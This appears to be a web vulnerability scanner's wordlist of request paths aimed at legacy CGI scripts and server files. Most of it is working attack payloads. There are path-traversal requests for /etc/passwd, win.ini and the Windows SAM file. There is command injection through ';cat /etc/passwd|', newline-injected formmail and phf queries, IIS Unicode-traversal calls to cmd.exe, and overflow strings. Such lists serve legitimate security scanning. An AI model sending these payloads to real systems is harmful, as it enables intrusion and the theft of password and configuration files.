/cgi-bin/dcboard.cgi
/cgi-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
/cgi-bin/dcforum/
/cgi-bin/dcforumlib.pl
/cgi-bin/dcshop/auth_data/auth_user_file.txt
/cgi-bin/dcshop/orders/orders.txt
/cgi-bin/dfire.cgi
/cgi-bin/diagnose.cgi
/cgi-bin/dig.cgi
/cgi-bin/directory.php?dir=%3Bmore%20/etc/passwd
/cgi-bin/directorypro.cgi
/cgi-bin/directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
/cgi-bin/displayTC.pl
/cgi-bin/dmailweb.cgi
/cgi-bin/dnewsweb
/cgi-bin/dnewsweb.cgi
/cgi-bin/donothing
/cgi-bin/download.cgi
/cgi-bin/dumpenv.pl
/cgi-bin/echo.bat
/cgi-bin/echo.bat?&dir+c:\
/cgi-bin/edit.pl
/cgi-bin/empower?DB=UkRteamHole
/cgi-bin/empower?DB=whateverwhatever
/cgi-bin/emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/enter.cgi
/cgi-bin/environ.cgi
/cgi-bin/environ.pl
/cgi-bin/erba/start/
/cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
/cgi-bin/eshop.pl?seite=;cat%20/etc/passwd|
/cgi-bin/everythingform.cgi
/cgi-bin/ews
/cgi-bin/ex-logger.pl
/cgi-bin/excite
/cgi-bin/excite;IFS=\
/cgi-bin/ezadmin.cgi
/cgi-bin/ezboard.cgi
/cgi-bin/ezman.cgi
/cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
/cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
/cgi-bin/ezshopper2/loadpage.cgi
/cgi-bin/ezshopper3/loadpage.cgi
/cgi-bin/faqmanager.cgi?toc=/etc/passwd%00
/cgi-bin/faxsurvey
/cgi-bin/faxsurvey?cat%20/etc/passwd
/cgi-bin/fexplore.exe
/cgi-bin/filemail
/cgi-bin/filemail.cgi
/cgi-bin/filemail.pl
/cgi-bin/filemail.pl
/cgi-bin/files.pl
/cgi-bin/finger
/cgi-bin/finger.cgi
/cgi-bin/finger.pl
/cgi-bin/flexform
/cgi-bin/flexform.cgi
/cgi-bin/fom.cgi?file=
/cgi-bin/fom/fom.cgi?cmd=&file=1&keywords=vulnerable
/cgi-bin/form.cgi
/cgi-bin/formmail
/cgi-bin/formmail.cgi
/cgi-bin/formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
/cgi-bin/formmail.pl
/cgi-bin/formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
/cgi-bin/formmail2.cgi
/cgi-bin/formmail2.pl
/cgi-bin/formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
/cgi-bin/fortune
/cgi-bin/fpadmin.htm
/cgi-bin/fpexplore.exe
/cgi-bin/fpremadm.exe
/cgi-bin/fpsrvadm.exe
/cgi-bin/ftp.pl
/cgi-bin/gH.cgi
/cgi-bin/gbook.cgi
/cgi-bin/gbook/gbook.cgi
/cgi-bin/gbook/gbook.cgi?_MAILTO=check;id
/cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1
/cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
/cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
/cgi-bin/get32.exe
/cgi-bin/getdoc.cgi
/cgi-bin/gettransbitmap
/cgi-bin/glimpse
/cgi-bin/glimpse|glimpse|
/cgi-bin/global.cgi
/cgi-bin/gm-authors.cgi
/cgi-bin/gm-cplog.cgi
/cgi-bin/gm.cgi
/cgi-bin/guestbook.cgi
/cgi-bin/guestbook.cgi
/cgi-bin/guestbook.pl
/cgi-bin/handler
/cgi-bin/handler.cgi
/cgi-bin/handler/netsonar;cat    /etc/passwd|?data=Download
/cgi-bin/hello.bat
/cgi-bin/hello.bat?&dir+c:\
/cgi-bin/hitview.cgi
/cgi-bin/hsx.cgi
/cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00
/cgi-bin/hsx.cgi?show=../../../../../../etc/passwd%00
/cgi-bin/htgrep
/cgi-bin/htgrep?file=index.html&hdr=/etc/passwd
/cgi-bin/htimage.exe
/cgi-bin/htmldocs
/cgi-bin/htmlscript
/cgi-bin/htmlscript?../../../../../../../../../../etc/passwd
/cgi-bin/htmlscript?../../../../etc/passwd
/cgi-bin/htmlscript|htmlscript|
/cgi-bin/htsearch
/cgi-bin/htsearch.cgi?words=
/cgi-bin/htsearch?-c/nonexistant
/cgi-bin/htsearch?config=aaa
/cgi-bin/htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
/cgi-bin/htsearch?exclude=%60/etc/passwd%60
/cgi-bin/ibill.pm
/cgi-bin/icat
/cgi-bin/ikonboard/help.cgi
/cgi-bin/ikonboard/help.cgi?
/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00
/cgi-bin/imagemap
/cgi-bin/imagemap.exe
/cgi-bin/imagemap.exe?aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
/cgi-bin/inc/sendmail.inc
/cgi-bin/index.js0x70
/cgi-bin/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2Fetc
/cgi-bin/info2www
/cgi-bin/info2www '(../../../../../../../bin/mail root </etc/passwd>
/cgi-bin/infosrch.cgi
/cgi-bin/input.bat
/cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
/cgi-bin/input2.bat
/cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
/cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
/cgi-bin/ion-p?page=../../../../../etc/passwd
/cgi-bin/ipf/etc/gfw/ui/pwd.dat
/cgi-bin/jj
/cgi-bin/journal.cgi?folder=journal.cgi%00
/cgi-bin/ksh
/cgi-bin/lasso.cgi
/cgi-bin/lastlines.cgi?process
/cgi-bin/listrec.pl
/cgi-bin/loadpage.cgi
/cgi-bin/loadpage.cgi?user_id=1&file=../../../../../../../../../../etc/passwd
/cgi-bin/loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
/cgi-bin/log-reader.cgi
/cgi-bin/log/
/cgi-bin/log/nether-log.pl?checkit
/cgi-bin/login.cgi
/cgi-bin/login.pl
/cgi-bin/login.pl?course_id=\
/cgi-bin/logit.cgi
/cgi-bin/logs
/cgi-bin/logs.pl
/cgi-bin/logs/
/cgi-bin/logs/access_log
/cgi-bin/lookwho.cgi
/cgi-bin/ls
/cgi-bin/lsindex2.bat
/cgi-bin/lwgate
/cgi-bin/lwgate.cgi
/cgi-bin/mail
/cgi-bin/mail.cgi
/cgi-bin/mail.pl   
/cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/mailengine.pl
/cgi-bin/mailfile.cgi
/cgi-bin/mailform.exe
/cgi-bin/mailform.pl
/cgi-bin/mailit.pl
/cgi-bin/maillist.cgi
/cgi-bin/maillist.pl
/cgi-bin/maillist.pl
/cgi-bin/mailnews.cgi
/cgi-bin/mailto.cgi
/cgi-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
/cgi-bin/main_menu.pl
/cgi-bin/majordomo.pl
/cgi-bin/makedld.cgi
/cgi-bin/man.cgi?man=ls;id;pwd;
/cgi-bin/man.sh
/cgi-bin/man.sh
/cgi-bin/mdma.bat
/cgi-bin/message.cgi
/cgi-bin/meta.pl
/cgi-bin/mgrqcgi
/cgi-bin/mini_logger.cgi
/cgi-bin/minimal.exe
/cgi-bin/mkilog.exe
/cgi-bin/mkplog.exe
/cgi-bin/mlog.phtml
/cgi-bin/mmstdod.cgi
/cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=
/cgi-bin/mrtg.cfg?cfg=../../../../../../../../etc/passwd
/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
/cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini
/cgi-bin/mrtg.cgi?cfg=blah
/cgi-bin/ms_proxy_auth_query/
/cgi-bin/multihtml.pl?multi=/etc/passwd%00html
/cgi-bin/myguestbook.cgi?action=view
/cgi-bin/ncommerce3/ExecMacro/macro.d2w
/cgi-bin/ncommerce3/ExecMacro/macro.d2w/
/cgi-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a
/cgi-bin/ncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK
/cgi-bin/netauth.cgi
/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
/cgi-bin/netpad.cgi
/cgi-bin/newdesk
/cgi-bin/news/news.cgi
/cgi-bin/newsdesk.cgi
/cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd
/cgi-bin/newsdesk.cgi?t=../pass.txt
/cgi-bin/nlog-smb.cgi
/cgi-bin/nlog-smb.pl
/cgi-bin/nph-emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/nph-error.pl
/cgi-bin/nph-maillist.pl
/cgi-bin/nph-publish
/cgi-bin/nph-publish.cgi
/cgi-bin/nph-test-cgi
/cgi-bin/ntitar.pl
/cgi-bin/opendir.php?/etc/passwd
/cgi-bin/orders/orders.txt
/cgi-bin/pagelog.cgi
/cgi-bin/pals-cgi
/cgi-bin/pals-cgi?palsAction=restart&documentName=/etc/passwd
/cgi-bin/pass
/cgi-bin/passwd
/cgi-bin/passwd.txt
/cgi-bin/password
/cgi-bin/password.txt
/cgi-bin/pbcgi.cgi?name=Joe%Camel&email=
/cgi-bin/perl
/cgi-bin/perl.exe
/cgi-bin/perl.exe
/cgi-bin/perl.exe?-v
/cgi-bin/perl?-v
/cgi-bin/perlshop.cgi
/cgi-bin/pfdispaly.cgi
/cgi-bin/pfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'
/cgi-bin/pfdispaly.cgi?../../../../../../../../../../etc/passwd
/cgi-bin/pfdisplay
/cgi-bin/pfdisplay.cgi
/cgi-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
/cgi-bin/pfdisplay|pfdisplay|
/cgi-bin/phf
/cgi-bin/phf.cgi
/cgi-bin/phf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
/cgi-bin/phf?Qname=root%0Acat%20/etc/passwd%20
/cgi-bin/php
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php.cgi?/etc/passwd
/cgi-bin/plusmail
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00
/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=\etc\passwd%00
/cgi-bin/pollssi.cgi
/cgi-bin/post-query
/cgi-bin/post16.exe
/cgi-bin/post32.exe
/cgi-bin/post32.exe|dir%20c:\
/cgi-bin/post_query
/cgi-bin/postcards.cgi
/cgi-bin/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi&TopicSubject=&replyto=0
/cgi-bin/powerup/r.cgi?FILE=../../../../../../../../../../etc/passwd
/cgi-bin/ppdscgi.exe
/cgi-bin/printenv
/cgi-bin/processit.pl
/cgi-bin/profile.cgi
/cgi-bin/pu3.pl
/cgi-bin/publisher/search.cgi?dir=jobs&template=;cat%20/etc/passwd|&output_number=10
/cgi-bin/publisher/search.cgi?dir=jobs&template=;cat+/etc/passwd|&output_number=10
/cgi-bin/query
/cgi-bin/query?mss=%2e%2e/config
/cgi-bin/quickstore.cgi?page=../../../../../../../../../../etc/passwd%00html&cart_id=
/cgi-bin/quizme.cgi
/cgi-bin/r.cgi?FILE=../../../../../../../../../../etc/passwd
/cgi-bin/ratlog.cgi
/cgi-bin/redir.exe
/cgi-bin/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom
/cgi-bin/redirect
/cgi-bin/redirect.cgi
/cgi-bin/redirect.exe
/cgi-bin/register.cgi
/cgi-bin/replicator/webpage.cgi
/cgi-bin/replicator/webpage.cgi/
/cgi-bin/responder.cgi
/cgi-bin/retrieve_password.pl
/cgi-bin/rguest.exe
/cgi-bin/rksh
/cgi-bin/rmp_query
/cgi-bin/robadmin.cgi
/cgi-bin/robpoll.cgi
/cgi-bin/rpm_query
/cgi-bin/rsh
/cgi-bin/rtm.log
/cgi-bin/rwcgi60
/cgi-bin/rwcgi60/showenv
/cgi-bin/rwwwshell.pl
/cgi-bin/s.cgi?q=a&tmpl=check
/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
/cgi-bin/sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
/cgi-bin/scoadminreg.cgi
/cgi-bin/scripts/whois.cgi?action=load&whois=check
/cgi-bin/search
/cgi-bin/search.cgi
/cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
/cgi-bin/search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
/cgi-bin/search.cgi?letter=
/cgi-bin/search.pl
/cgi-bin/search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=
/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00
/cgi-bin/search.pl?form=/etc/passwd%00
/cgi-bin/search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
/cgi-bin/search/tidfinder.cgi
/cgi-bin/search/tidfinder.cgi?2956734
/cgi-bin/sendform.cgi
/cgi-bin/sendpage.pl
/cgi-bin/sendtemp.pl
/cgi-bin/sendtemp.pl?templ=../../../../../../../../../../etc/passwd
/cgi-bin/sendtemp.pl?templ=../../etc/passwd
/cgi-bin/sensepost.exe?/c+dir
/cgi-bin/session/adminlogin
/cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
/cgi-bin/sh
/cgi-bin/shop.cgi
/cgi-bin/shop.cgi?page=../../../../../../../etc/passwd
/cgi-bin/shop.pl/page=;cat%20shop.pl|
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/orders/orders.txt
/cgi-bin/shopper.cgi
/cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd
/cgi-bin/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
/cgi-bin/show.pl
/cgi-bin/showcheckins.cgi?person=
/cgi-bin/shtml.dll
/cgi-bin/simple/view_page?mv_arg=|cat%20/etc/passwd|
/cgi-bin/simplestguest.cgi
/cgi-bin/simplestmail.cgi
/cgi-bin/snorkerz.bat
/cgi-bin/snorkerz.cmd
/cgi-bin/sojourn.cgi
/cgi-bin/sojourn.cgi?cat=../../../../../../../../../../etc/password%00
/cgi-bin/spin_client.cgi
/cgi-bin/spin_client.cgi?aaaaaaaa
/cgi-bin/ss
/cgi-bin/sscd_suncourier.pl
/cgi-bin/ssi
/cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/cgi-bin/start.cgi/
/cgi-bin/stat.pl
/cgi-bin/stat/
/cgi-bin/stats-bin-p/reports/index.html
/cgi-bin/stats.pl
/cgi-bin/stats.prf
/cgi-bin/stats.prg
/cgi-bin/stats/
/cgi-bin/stats/statsbrowse.asp?filepath=c:\&Opt=3
/cgi-bin/stats_old/
/cgi-bin/statsconfig
/cgi-bin/statsconfig.pl
/cgi-bin/statusconfig.pl
/cgi-bin/statview.pl
/cgi-bin/store.cgi
/cgi-bin/store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
/cgi-bin/store.cgi?StartID=../etc/hosts%00.html
/cgi-bin/store.cgi?StartID=../etc/passwd%00.html
/cgi-bin/store/agora.cgi?cart_id=
/cgi-bin/store/agora.cgi?page=whatever33.html
/cgi-bin/story.pl?next=../../../../../../../../../../etc/passwd%00
/cgi-bin/story.pl?next=../../../etc/passwd%00
/cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd%00
/cgi-bin/subscribe.pl
/cgi-bin/survey
/cgi-bin/survey.cgi
/cgi-bin/sws/admin.html
/cgi-bin/tablebuild.pl
/cgi-bin/talkback.cgi
/cgi-bin/talkback.cgi?
/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
/cgi-bin/tcsh
/cgi-bin/technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
/cgi-bin/test-cgi
/cgi-bin/test-cgi.bat
/cgi-bin/test-cgi.bat?|ver
/cgi-bin/test-cgi.tcl
/cgi-bin/test-cgi?/*
/cgi-bin/test-env
/cgi-bin/test.bat
/cgi-bin/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
/cgi-bin/test.cgi
/cgi-bin/test.cgi
/cgi-bin/test.cgi HTTP/1.0\r\n\r\n
/cgi-bin/test.cgi HTTP/1.1\r\n\r\n
/cgi-bin/test.cgi?/etc/passwd/*
/cgi-bin/test/test.cgi
/cgi-bin/test2.pl?&lt
/cgi-bin/testcgi.exe
/cgi-bin/testing_whatever
/cgi-bin/texis.exe/junk
/cgi-bin/texis/junk
/cgi-bin/textcounter.pl
/cgi-bin/tidfinder.cgi
/cgi-bin/tigvote.cgi
/cgi-bin/title.cgi
/cgi-bin/tpgnrock
/cgi-bin/tradecli.dll
/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
/cgi-bin/troops.cgi
/cgi-bin/tst.bat
/cgi-bin/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
/cgi-bin/ttawebtop.cgi
/cgi-bin/ttawebtop.cgi/
/cgi-bin/ttawebtop.cgi/?action
/cgi-bin/ttawebtop.cgi/?action=
/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
/cgi-bin/ultraboard.cgi
/cgi-bin/ultraboard.pl
/cgi-bin/unlg1.1
/cgi-bin/unlg1.2
/cgi-bin/update.dpgs
/cgi-bin/upload.cgi
/cgi-bin/upload.pl
/cgi-bin/upload_file.pl
/cgi-bin/uptime
/cgi-bin/urlcount.cgi
/cgi-bin/ustorekeeper.pl
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/cgi-bin/view-source
/cgi-bin/view-source?view-source
/cgi-bin/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
/cgi-bin/view_page.html
/cgi-bin/viewcvs.cgi/viewcvs/?cvsroot=
/cgi-bin/viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\
/cgi-bin/viewlogs.pl
/cgi-bin/viewsource?/etc/passwd
/cgi-bin/viewsrc.cgi
/cgi-bin/viralator.cgi
/cgi-bin/virgil.cgi
/cgi-bin/visadmin.exe
/cgi-bin/visitor.exe
/cgi-bin/visitor.exe
/cgi-bin/vote.cgi
/cgi-bin/vpasswd.cgi
/cgi-bin/vq/demos/respond.pl?
/cgi-bin/w2-msql
/cgi-bin/w3-msql
/cgi-bin/w3-msql/
/cgi-bin/w3-sql
/cgi-bin/w3tvars.pm
/cgi-bin/wais.pl
/cgi-bin/way-board.cgi?db=/etc/passwd%00
/cgi-bin/way-board/way-board.cgi?db=/etc/passwd%00
/cgi-bin/wconsole.dll
/cgi-bin/webais
/cgi-bin/webbbs.cgi
/cgi-bin/webbbs.exe
/cgi-bin/webbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD
/cgi-bin/webdata.cgi
/cgi-bin/webdist.cgi
/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
/cgi-bin/webdriver
/cgi-bin/webfind.exe?keywords=01234567890123456789
/cgi-bin/webgais
/cgi-bin/webif.cgi
/cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/webmap.cgi
/cgi-bin/webnews.pl
/cgi-bin/webplus
/cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml
/cgi-bin/webplus.exe
/cgi-bin/webplus.exe?about
/cgi-bin/webplus?about
/cgi-bin/webplus?script=../../../../../../../../../../etc/passwd
/cgi-bin/websendmail
/cgi-bin/webspirs.cgi
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/passwd
/cgi-bin/websync.exe
/cgi-bin/webutil.pl
/cgi-bin/webutils.pl
/cgi-bin/webwho.pl
/cgi-bin/wguest.exe
/cgi-bin/whois.cgi
/cgi-bin/whois.cgi?action=load&whois=%3Bid
/cgi-bin/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
/cgi-bin/whois/whois.cgi?lookup=;&ext=/bin/cat%20/etc/passwd
/cgi-bin/whois_raw.cgi
/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
/cgi-bin/windmail
/cgi-bin/windmail.exe
/cgi-bin/wrap
/cgi-bin/wrap.cgi
/cgi-bin/ws_ftp.ini
/cgi-bin/www-sql
/cgi-bin/www-sql
/cgi-bin/wwwadmin.pl
/cgi-bin/wwwboard.cgi
/cgi-bin/wwwboard.cgi.cgi
/cgi-bin/wwwboard.pl
/cgi-bin/wwwboard.pl
/cgi-bin/wwwstats.pl
/cgi-bin/wwwthreads/3tvars.pm
/cgi-bin/wwwthreads/w3tvars.pm
/cgi-bin/wwwwais
/cgi-bin/zml.cgi?file=../../../../../../../../../../etc/passwd%00
/cgi-bin/zml.cgi?file=../../../../../../../../../etc/passwd%00
/cgi-bin/zsh
/cgi-bin\\\test.cgi
/cgi-bin\\test.cgi
/cgi-bin\test.cgi
/cgi-dos/args.bat
/cgi-dos/args.cmd
/cgi-dos/perl.exe
/cgi-local/cgiemail-1.4/cgicso?query=
/cgi-local/cgiemail-1.4/cgicso?query=AAA
/cgi-local/cgiemail-1.6/cgicso?query=
/cgi-local/cgiemail-1.6/cgicso?query=AAA
/cgi-sdb
/cgi-shl/win-c-sample.exe
/cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
/cgi-sys/FormMail-clone.cgi
/cgi-sys/addalink.cgi
/cgi-sys/cgiecho
/cgi-sys/cgiemail
/cgi-sys/countedit
/cgi-sys/domainredirect.cgi
/cgi-sys/entropybanner.cgi
/cgi-sys/entropysearch.cgi
/cgi-sys/helpdesk.cgi
/cgi-sys/mchat.cgi
/cgi-sys/randhtml.cgi
/cgi-sys/realhelpdesk.cgi
/cgi-sys/realsignup.cgi
/cgi-sys/scgiwrap
/cgi-sys/signup.cgi
/cgi-win/cgitest.exe
/cgi-win/uploader.exe
/cgi-win/wincgi.bat
/cgi-win/wwwuploader.exe
/cgi/
/cgi/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/cgi/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir
/cgi/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/cgi/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/cgi/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir
/cgi/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir
/cgi/.cobalt/siteUserMod/siteUserMod.cgi
/cgi/AT-admin.cgi
/cgi/AT-generate.cgi
/cgi/AnyForm2
/cgi/Board/db/
/cgi/Count.cgi
/cgi/CrazyWWWBoard.cgi
/cgi/Search.pl
/cgi/Xrun.cgi
/cgi/YaBB.pl
/cgi/ad.cgi
/cgi/adcycle
/cgi/admin/admin
/cgi/aglimpse
/cgi/allmanage.pl
/cgi/allmanageup.pl
/cgi/amlite/amadmin.pl
/cgi/anacondaclip.pl?template=check
/cgi/auktion.pl
/cgi/awl/auctionweaver.pl
/cgi/bb-hist.sh
/cgi/bbs_forum.cgi
/cgi/bizdb1-search.cgi
/cgi/bnbform.cgi
/cgi/build.cgi
/cgi/cached_feed.cgi
/cgi/cachemgr.cgi
/cgi/cal_make.pl
/cgi/calender.pl
/cgi/calender_admin.pl
/cgi/campas
/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini
/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini
/cgi/cgiforum.pl
/cgi/cgiproc?
/cgi/cgiwrap
/cgi/changepw.cgi
/cgi/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
/cgi/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir
/cgi/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
/cgi/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir
/cgi/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir
/cgi/classifieds.cgi
/cgi/commerce.cgi?page=check
/cgi/counterfiglet/nc/f
/cgi/cvsweb/cvsweb.cgi
/cgi/day5datacopier.cgi
/cgi/day5datanotifier.cgi
/cgi/db2www/library/document.d2w/show
/cgi/dcadmin.cgi
/cgi/dcboard.cgi
/cgi/dcforumlib.pl
/cgi/dmailweb.cgi
/cgi/dnewsweb.cgi
/cgi/dumpenv.pl
/cgi/edit.pl
/cgi/empower?DB=UkRteamHole
/cgi/environ.cgi
/cgi/everythingform.cgi
/cgi/ezshopper2/loadpage.cgi
/cgi/ezshopper3/loadpage.cgi
/cgi/faxsurvey
/cgi/filemail.pl
/cgi/files.pl
/cgi/finger
/cgi/formmail.cgi
/cgi/gbook/gbook.cgi?_MAILTO=check;id
/cgi/getdoc.cgi
/cgi/glimpse
/cgi/global.cgi
/cgi/guestbook.cgi
/cgi/guestbook.pl
/cgi/handler
/cgi/hsx.cgi
/cgi/htgrep
/cgi/htmlscript
/cgi/htsearch
/cgi/htsearch?config=aaa
/cgi/ikonboard/help.cgi
/cgi/info2www
/cgi/infosrch.cgi
/cgi/ipf/etc/gfw/ui/pwd.dat
/cgi/jj
/cgi/lasso.cgi
/cgi/loadpage.cgi
/cgi/mailfile.cgi
/cgi/mailform.pl
/cgi/maillist.pl
/cgi/mailnews.cgi
/cgi/mailto.cgi
/cgi/man.sh
/cgi/mdma.bat
/cgi/mmstdod.cgi?ALTERNATE_TEMPLATES=
/cgi/netauth.cgi
/cgi/news/news.cgi
/cgi/newsdesk.cgi?t=../pass.txt
/cgi/nph-maillist.pl
/cgi/nph-publish
/cgi/nph-test-cgi
/cgi/pagelog.cgi
/cgi/pals-cgi
/cgi/perl
/cgi/perl.exe
/cgi/perlshop.cgi
/cgi/pfdisplay.cgi
/cgi/phf
/cgi/phf.cgi
/cgi/php
/cgi/php.cgi
/cgi/plusmail
/cgi/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00
/cgi/post-query
/cgi/postings.cgi?action=reply&forum=&number=1&topic=000001.cgi&TopicSubject=&replyto=0
/cgi/processit.pl
/cgi/query
/cgi/redirect.cgi
/cgi/register.cgi
/cgi/replicator/webpage.cgi
/cgi/responder.cgi
/cgi/rpm_query
/cgi/rwwwshell.pl
/cgi/s.cgi?q=a&tmpl=check
/cgi/scripts/whois.cgi?action=load&whois=check
/cgi/search.cgi?letter=
/cgi/search/tidfinder.cgi?2956734
/cgi/simplestguest.cgi
/cgi/simplestmail.cgi
/cgi/ssi
/cgi/store.cgi?StartID=../etc/hosts%00.html
/cgi/subscribe.pl
/cgi/survey.cgi
/cgi/test-cgi
/cgi/textcounter.pl
/cgi/ultraboard.cgi
/cgi/unlg1.1
/cgi/unlg1.2
/cgi/upload_file.pl
/cgi/ustorekeeper.pl
/cgi/view-source
/cgi/view_page.html
/cgi/w3-msql
/cgi/wais.pl
/cgi/webdata.cgi
/cgi/webdist.cgi
/cgi/webdriver
/cgi/webgais
/cgi/webplus.cgi?Script=/webplus/webping/webping.wml
/cgi/websendmail
/cgi/webspirs.cgi
/cgi/webwho.pl
/cgi/whois_raw.cgi
/cgi/wrap
/cgi/wrap.cgi
/cgi/www-sql
/cgi/wwwboard.pl
/cgis/wwwboard/wwwboard.cgi
/cgis/wwwboard/wwwboard.pl
/chassis/config/GeneralChassisConfig.html
/chatlog.nsf
/check.html
/chip.ini
/class/mysql.class
/clbusy.nsf
/cldbdir.nsf
/clocktower/
/clusta4.nsf
/code.php3
/code/
/code/faqmanager.cgi?toc=/etc/passwd%00
/codes/
/collect4.nsf
/com
/com/novell/gwmonitor/help/en/default.htm
/com/novell/webaccess/help/en/default.htm
